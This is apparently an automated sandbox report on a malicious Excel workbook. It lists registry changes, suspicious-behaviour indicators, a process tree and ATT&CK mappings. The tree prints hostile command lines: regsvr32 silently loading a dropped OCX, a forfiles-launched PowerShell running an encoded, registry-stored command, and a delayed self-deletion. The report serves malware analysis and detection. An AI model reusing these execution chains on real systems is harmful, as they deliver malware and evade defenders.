Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 0048fe7da4b9d601	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{A86927A1-2597-11EB-9E5C-424ABE5A776C} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000039e08b06c84715459283081ff7bb5a6000000000020000000000106600000001000020000000d135933796e544f414a667823e3d7311087e2162d8ccfd2cd3580e943415c41c000000000e8000000002000020000000c13f21e90237c65ffdf7ceaf7f668cae59a6c6f2966b1e2bee4c92346f01e0ae300100007a0f74b6a3e04358a90c5a6c17a6ba80727342808e4db92c8e71cb79ba0e9c1f4eaa2ff21c321788f760bde0fb54f54d43c53f2068433bc69fb9c1a027e697a3b4fde903f66364fcb901239bcb75f944bf87a4b1cc56d6cfbfe422de1ec208d1d0dc45200d4ea2e6dadf71e6a7ff35991eb43359b3941159240a73bcefb8eac26c7503ec6d91aa2d980dea689fb33239bd13c29648cb8da23ed7848cc2aef969b162e7ea3a0f7be56d92076c2a6270975daff721a1004d1efbbc5c078a2a92f182c2e5c204942264b224f36fea06226585823884053c10b6056bf850ddf177766b2bc94cfd9f6ba7b446be68a638805c66d18adab484dcff6ca0868842bc6ef67fe0ad218e5c369109d78d86a02efbda01c4d4f0b0ebfa692054066845e307423e4a45135c9faea58931f1477abec9da40000000cf01239713b0f4a913ace74d81785b394b632b2aaf7a4d70d8b7d9d1f720e88570c2fd3de5481de8a3400637f53d107a4f7d7a3a6ce7808d3b50c7d5fe7729d7	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000039e08b06c84715459283081ff7bb5a60000000000200000000001066000000010000200000006f8616cdc84e70fb55f649bb448e5ea3f8daae3048c621941edb9124d092b497000000000e8000000002000020000000d800cfe33a897cad6d4285e246d2bcd5101eb322922b9a5d910f94c9d4f70830300100003c1451919a690c68f8f650a7faa7a8f390e0458573286eb8796de5d1a72a74e3113c1da1a719197f7265fb471ef96c6199c4984fece80abfec9b993c0d35a5857efa1692f996c36bdbb3adb8e73abb3dc5cb0a8fd98571c7df932241e5359b3e413264664c9dbe4687e0dbbf7c42cbfe9036527ef98d7eb7917a34082ad06237ebf349d37a2c0eeb898fa7cb9f6330bdb03da488d4e4979a18e3452f34a62016570cf8ccdd8aad09472b6f6a0e8c0fd20b5ef62d43b279ca5a27a36c7bdb52ae024225b5c1f0f35d968f8fe7381c1e38f0708b2ec9892a4a20a207eb1e7830dfde999aa7c87136648b0411d728f98ec01a28b55b37b945aaabde00d3524dba6541d238ff1ad25b330f3f15b04d415936d24ccd32467f8ef0c63196a1c03037b19fb43946c34e1be2039c738def51f08b400000003efe1f83a66bcb45a1af9e0d0d7f9e57b791cec9cbc7c370bfa3976ca468772c90a7b47b79e121a30f691483f8cb1b4746682cab1120e1c11a5bc2260728f024	iexplore.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1900	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1072	powershell.exe
1072	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1072	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1072	powershell.exe

Suspicious use of FindShellTrayWindow 13 IoCs

pid	Process
1096	iexplore.exe
2248	iexplore.exe
2464	iexplore.exe
2464	iexplore.exe
2464	iexplore.exe
2464	iexplore.exe
2464	iexplore.exe
2464	iexplore.exe
2464	iexplore.exe
2464	iexplore.exe
2464	iexplore.exe
2464	iexplore.exe
2464	iexplore.exe

Suspicious use of SetWindowsHookEx 57 IoCs

pid	Process
1900	EXCEL.EXE
1900	EXCEL.EXE
1900	EXCEL.EXE
1096	iexplore.exe
1096	iexplore.exe
1580	IEXPLORE.EXE
1580	IEXPLORE.EXE
2248	iexplore.exe
2248	iexplore.exe
2300	IEXPLORE.EXE
2300	IEXPLORE.EXE
2464	iexplore.exe
2464	iexplore.exe
2512	IEXPLORE.EXE
2512	IEXPLORE.EXE
2464	iexplore.exe
2464	iexplore.exe
2640	IEXPLORE.EXE
2640	IEXPLORE.EXE
2464	iexplore.exe
2464	iexplore.exe
2512	IEXPLORE.EXE
2512	IEXPLORE.EXE
2464	iexplore.exe
2464	iexplore.exe
2512	IEXPLORE.EXE
2512	IEXPLORE.EXE
2464	iexplore.exe
2464	iexplore.exe
1900	EXCEL.EXE
1900	EXCEL.EXE
2512	IEXPLORE.EXE
2512	IEXPLORE.EXE
2464	iexplore.exe
2464	iexplore.exe
2512	IEXPLORE.EXE
2512	IEXPLORE.EXE
2464	iexplore.exe
2464	iexplore.exe
2512	IEXPLORE.EXE
2512	IEXPLORE.EXE
2464	iexplore.exe
2464	iexplore.exe
2512	IEXPLORE.EXE
2512	IEXPLORE.EXE
2464	iexplore.exe
2464	iexplore.exe
2512	IEXPLORE.EXE
2512	IEXPLORE.EXE
2464	iexplore.exe
2464	iexplore.exe
2512	IEXPLORE.EXE
2512	IEXPLORE.EXE
2464	iexplore.exe
2464	iexplore.exe
2512	IEXPLORE.EXE
2512	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 48 IoCs

description	pid	Process	procid_target
PID 1900 wrote to memory of 1496	1900	EXCEL.EXE	31
PID 1900 wrote to memory of 1496	1900	EXCEL.EXE	31
PID 1900 wrote to memory of 1496	1900	EXCEL.EXE	31
PID 1900 wrote to memory of 1496	1900	EXCEL.EXE	31
PID 1900 wrote to memory of 1496	1900	EXCEL.EXE	31
PID 1900 wrote to memory of 1496	1900	EXCEL.EXE	31
PID 1900 wrote to memory of 1496	1900	EXCEL.EXE	31
PID 1096 wrote to memory of 1580	1096	iexplore.exe	37
PID 1096 wrote to memory of 1580	1096	iexplore.exe	37
PID 1096 wrote to memory of 1580	1096	iexplore.exe	37
PID 1096 wrote to memory of 1580	1096	iexplore.exe	37
PID 2248 wrote to memory of 2300	2248	iexplore.exe	40
PID 2248 wrote to memory of 2300	2248	iexplore.exe	40
PID 2248 wrote to memory of 2300	2248	iexplore.exe	40
PID 2248 wrote to memory of 2300	2248	iexplore.exe	40
PID 2464 wrote to memory of 2512	2464	iexplore.exe	42
PID 2464 wrote to memory of 2512	2464	iexplore.exe	42
PID 2464 wrote to memory of 2512	2464	iexplore.exe	42
PID 2464 wrote to memory of 2512	2464	iexplore.exe	42
PID 2464 wrote to memory of 2640	2464	iexplore.exe	43
PID 2464 wrote to memory of 2640	2464	iexplore.exe	43
PID 2464 wrote to memory of 2640	2464	iexplore.exe	43
PID 2464 wrote to memory of 2640	2464	iexplore.exe	43
PID 1468 wrote to memory of 1944	1468	cmd.exe	47
PID 1468 wrote to memory of 1944	1468	cmd.exe	47
PID 1468 wrote to memory of 1944	1468	cmd.exe	47
PID 1944 wrote to memory of 1156	1944	forfiles.exe	49
PID 1944 wrote to memory of 1156	1944	forfiles.exe	49
PID 1944 wrote to memory of 1156	1944	forfiles.exe	49
PID 1156 wrote to memory of 1072	1156	cmd.exe	50
PID 1156 wrote to memory of 1072	1156	cmd.exe	50
PID 1156 wrote to memory of 1072	1156	cmd.exe	50
PID 1072 wrote to memory of 2624	1072	powershell.exe	51
PID 1072 wrote to memory of 2624	1072	powershell.exe	51
PID 1072 wrote to memory of 2624	1072	powershell.exe	51
PID 2624 wrote to memory of 2620	2624	csc.exe	52
PID 2624 wrote to memory of 2620	2624	csc.exe	52
PID 2624 wrote to memory of 2620	2624	csc.exe	52
PID 1072 wrote to memory of 1744	1072	powershell.exe	53
PID 1072 wrote to memory of 1744	1072	powershell.exe	53
PID 1072 wrote to memory of 1744	1072	powershell.exe	53
PID 1744 wrote to memory of 2780	1744	csc.exe	54
PID 1744 wrote to memory of 2780	1744	csc.exe	54
PID 1744 wrote to memory of 2780	1744	csc.exe	54
PID 1072 wrote to memory of 1260	1072	powershell.exe	21
PID 2856 wrote to memory of 2880	2856	cmd.exe	57
PID 2856 wrote to memory of 2880	2856	cmd.exe	57
PID 2856 wrote to memory of 2880	2856	cmd.exe	57

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1260
- C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
  "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Information.xlsb
  2⤵
  - Enumerates system info in registry
  - Modifies Internet Explorer settings
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1900
- - C:\Windows\SysWOW64\regsvr32.exe
    regsvr32 -s C:\ProgramData\Dori.ocx
    3⤵
    - Process spawned unexpected child process
    - Loads dropped DLL
    PID:1496
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwASQBkAGUAbgB0AGkAdAB5AHcAbwByACcAKQAuAEQA & exit" /p C:\Windows\system32 /s /m po*l.e*e
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1468
- - C:\Windows\system32\forfiles.exe
    forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwASQBkAGUAbgB0AGkAdAB5AHcAbwByACcAKQAuAEQA & exit" /p C:\Windows\system32 /s /m po*l.e*e
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1944
  - - C:\Windows\system32\cmd.exe
      /k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwASQBkAGUAbgB0AGkAdAB5AHcAbwByACcAKQAuAEQA & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1156
    - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwASQBkAGUAbgB0AGkAdAB5AHcAbwByACcAKQAuAEQA
        5⤵
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1072
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lywpdnzj\lywpdnzj.cmdline"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2624
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8160.tmp" "c:\Users\Admin\AppData\Local\Temp\lywpdnzj\CSC21B24D8A273C421894975F7AF478BCC.TMP"
        7⤵
        
        PID:2620
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fxyyuihv\fxyyuihv.cmdline"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1744
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES81BD.tmp" "c:\Users\Admin\AppData\Local\Temp\fxyyuihv\CSC53CB4AAE35A242B09F72A2EFED2E6A0.TMP"
        7⤵
        
        PID:2780
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C timeout /t 5 && del "C:\ProgramData\Dori.ocx"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2856
- - C:\Windows\system32\timeout.exe
    timeout /t 5
    3⤵
    - Delays execution with timeout.exe
    PID:2880

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1096
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1096 CREDAT:275457 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:1580

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2248
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2248 CREDAT:275457 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:2300

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2464
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2464 CREDAT:275457 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:2512
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2464 CREDAT:3748869 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:2640

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/316-0-0x000007FEF5BC0000-0x000007FEF5E3A000-memory.dmp

Filesize
2.5MB

Download
memory/1072-156-0x0000000002000000-0x0000000002001000-memory.dmp

Filesize
4KB

Download
memory/1072-144-0x000000001AB90000-0x000000001AB91000-memory.dmp

Filesize
4KB

Download
memory/1072-142-0x000007FEF4D30000-0x000007FEF571C000-memory.dmp

Filesize
9.9MB

Download
memory/1072-164-0x0000000002530000-0x0000000002531000-memory.dmp

Filesize
4KB

Download
memory/1072-143-0x0000000001FC0000-0x0000000001FC1000-memory.dmp

Filesize
4KB

Download
memory/1072-166-0x00000000026E0000-0x00000000026F8000-memory.dmp

Filesize
96KB

Download
memory/1072-145-0x0000000002500000-0x0000000002501000-memory.dmp

Filesize
4KB

Download
memory/1072-146-0x0000000001EB0000-0x0000000001EB1000-memory.dmp

Filesize
4KB

Download
memory/1072-148-0x000000001C3E0000-0x000000001C3E1000-memory.dmp

Filesize
4KB

Download
memory/1072-147-0x000000001B950000-0x000000001B951000-memory.dmp

Filesize
4KB

Download
memory/1496-4-0x00000000001D0000-0x00000000001E2000-memory.dmp

Filesize
72KB

Download
memory/2512-16-0x0000000002E70000-0x0000000002E71000-memory.dmp

Filesize
4KB

Download
memory/2512-46-0x0000000002E90000-0x0000000002E91000-memory.dmp

Filesize
4KB

Download
memory/2512-137-0x0000000006E10000-0x0000000006E33000-memory.dmp

Filesize
140KB

Download
memory/2512-135-0x0000000002E90000-0x0000000002E91000-memory.dmp

Filesize
4KB

Download
memory/2512-101-0x0000000003740000-0x0000000003741000-memory.dmp

Filesize
4KB

Download
memory/2512-106-0x0000000003740000-0x0000000003741000-memory.dmp

Filesize
4KB

Download
memory/2512-111-0x0000000003740000-0x0000000003741000-memory.dmp

Filesize
4KB

Download
memory/2512-53-0x00000000034E0000-0x00000000034E2000-memory.dmp

Filesize
8KB

Download
memory/2512-19-0x0000000002E70000-0x0000000002E71000-memory.dmp

Filesize
4KB

Download
memory/2512-52-0x00000000034E0000-0x00000000034E2000-memory.dmp

Filesize
8KB

Download
memory/2512-36-0x0000000002E90000-0x0000000002E91000-memory.dmp

Filesize
4KB

Download
memory/2512-34-0x0000000002E90000-0x0000000002E91000-memory.dmp

Filesize
4KB

Download
memory/2512-39-0x0000000002E90000-0x0000000002E91000-memory.dmp

Filesize
4KB

Download
memory/2512-41-0x0000000002E90000-0x0000000002E91000-memory.dmp

Filesize
4KB

Download
memory/2512-44-0x0000000002E90000-0x0000000002E91000-memory.dmp

Filesize
4KB

Download
memory/2512-136-0x0000000002E70000-0x0000000002E71000-memory.dmp

Filesize
4KB

Download
memory/2512-17-0x0000000002E70000-0x0000000002E71000-memory.dmp

Filesize
4KB

Download
memory/2512-27-0x0000000002E70000-0x0000000002E71000-memory.dmp

Filesize
4KB

Download